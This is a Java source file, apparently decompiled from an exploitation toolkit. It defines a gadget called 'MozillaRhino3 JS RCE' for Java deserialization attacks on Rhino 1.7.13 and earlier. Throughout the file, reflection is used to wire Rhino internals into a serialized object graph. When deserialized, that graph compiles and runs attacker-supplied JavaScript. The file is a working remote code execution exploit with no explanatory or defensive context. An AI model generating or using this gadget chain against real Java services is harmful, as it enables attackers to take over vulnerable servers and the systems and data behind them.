package com.ar3h.chains.gadget.impl.javanative.other;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.enums.Authors;
import com.ar3h.chains.common.util.Reflections;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Method;
import java.util.Hashtable;
import org.mozilla.javascript.Callable;
import org.mozilla.javascript.ClassCache;
import org.mozilla.javascript.Context;
import org.mozilla.javascript.ErrorReporter;
import org.mozilla.javascript.Evaluator;
import org.mozilla.javascript.IdScriptableObject;
import org.mozilla.javascript.Interpreter;
import org.mozilla.javascript.LazilyLoadedCtor;
import org.mozilla.javascript.NativeJavaObject;
import org.mozilla.javascript.Script;
import org.mozilla.javascript.Scriptable;
import org.mozilla.javascript.ScriptableObject;
import org.mozilla.javascript.tools.shell.Environment;

@GadgetAnnotation(name = "MozillaRhino3 JS RCE", dependencies = {"rhino:js <= 1.7.13"}, authors = {Authors.TINT0})
@GadgetTags(tags = {Tag.JavaNativeDeserialize}, nextTags = {Tag.Js_Expr})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/javanative/other/MozillaRhino3.class */
public class MozillaRhino3 implements Gadget {
    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        return getObject((String) gadgetChain.doCreate(gadgetContext));
    }

    public Object getObject(String str) throws Exception {
        Constructor<?> declaredConstructor = Class.forName("org.mozilla.javascript.NativeError").getDeclaredConstructor(new Class[0]);
        Reflections.setAccessible(declaredConstructor);
        IdScriptableObject idScriptableObject = (IdScriptableObject) declaredConstructor.newInstance(new Object[0]);
        Environment environment = new Environment();
        Hashtable hashtable = new Hashtable();
        hashtable.put("ClassCache", Reflections.createWithoutConstructor(ClassCache.class));
        Reflections.setFieldValue(environment, "associatedValues", hashtable);
        Context enter = Context.enter();
        Object createWithConstructor = Reflections.createWithConstructor(Class.forName("org.mozilla.javascript.MemberBox"), Class.forName("org.mozilla.javascript.MemberBox"), new Class[]{Method.class}, new Object[]{Context.class.getMethod("enter", new Class[0])});
        Environment environment2 = new Environment();
        new ClassCache().associate(environment2);
        try {
            Constructor<?> constructor = LazilyLoadedCtor.class.getDeclaredConstructors()[1];
            constructor.setAccessible(true);
            constructor.newInstance(environment2, "java", "org.mozilla.javascript.NativeJavaTopPackage", false, true);
        } catch (ArrayIndexOutOfBoundsException e) {
            Constructor<?> constructor2 = LazilyLoadedCtor.class.getDeclaredConstructors()[0];
            constructor2.setAccessible(true);
            constructor2.newInstance(environment2, "java", "org.mozilla.javascript.NativeJavaTopPackage", false);
        }
        Interpreter interpreter = new Interpreter();
        Method declaredMethod = Context.class.getDeclaredMethod("compileString", String.class, Evaluator.class, ErrorReporter.class, String.class, Integer.TYPE, Object.class);
        declaredMethod.setAccessible(true);
        Script script = (Script) declaredMethod.invoke(enter, str, interpreter, null, "test", 0, null);
        Constructor<?> constructor3 = Class.forName("org.mozilla.javascript.NativeScript").getDeclaredConstructors()[0];
        constructor3.setAccessible(true);
        Object newInstance = constructor3.newInstance(script);
        ScriptableObject.class.getDeclaredMethod("setParentScope", Scriptable.class).invoke(newInstance, environment2);
        try {
            Method declaredMethod2 = ScriptableObject.class.getDeclaredMethod("findAttributeSlot", String.class, Integer.TYPE, Class.forName("org.mozilla.javascript.ScriptableObject$SlotAccess"));
            Object obj = Class.forName("org.mozilla.javascript.ScriptableObject$SlotAccess").getEnumConstants()[3];
            Reflections.setAccessible(declaredMethod2);
            Reflections.setFieldValue(declaredMethod2.invoke(idScriptableObject, "getName", 0, obj), "getter", createWithConstructor);
        } catch (ClassNotFoundException e2) {
            try {
                Method declaredMethod3 = ScriptableObject.class.getDeclaredMethod("findAttributeSlot", String.class, Integer.TYPE, Integer.TYPE);
                Reflections.setAccessible(declaredMethod3);
                Reflections.setFieldValue(declaredMethod3.invoke(idScriptableObject, "getName", 0, 4), "getter", createWithConstructor);
            } catch (NoSuchMethodException e3) {
                Method declaredMethod4 = ScriptableObject.class.getDeclaredMethod("createSlot", Object.class, Integer.TYPE, Integer.TYPE);
                Reflections.setAccessible(declaredMethod4);
                Reflections.setFieldValue(declaredMethod4.invoke(idScriptableObject, "getName", 0, 4), "getter", createWithConstructor);
            }
        }
        idScriptableObject.setGetterOrSetter("directory", 0, (Callable) newInstance, false);
        NativeJavaObject nativeJavaObject = new NativeJavaObject();
        Reflections.setFieldValue(nativeJavaObject, "parent", environment);
        Reflections.setFieldValue(nativeJavaObject, "isAdapter", true);
        Reflections.setFieldValue(nativeJavaObject, "adapter_writeAdapterObject", getClass().getMethod("customWriteAdapterObject", Object.class, ObjectOutputStream.class));
        Reflections.setFieldValue(nativeJavaObject, "javaObject", idScriptableObject);
        return nativeJavaObject;
    }

    public static void customWriteAdapterObject(Object obj, ObjectOutputStream objectOutputStream) throws IOException {
        objectOutputStream.writeObject("java.lang.Object");
        objectOutputStream.writeObject(new String[0]);
        objectOutputStream.writeObject(obj);
    }
}
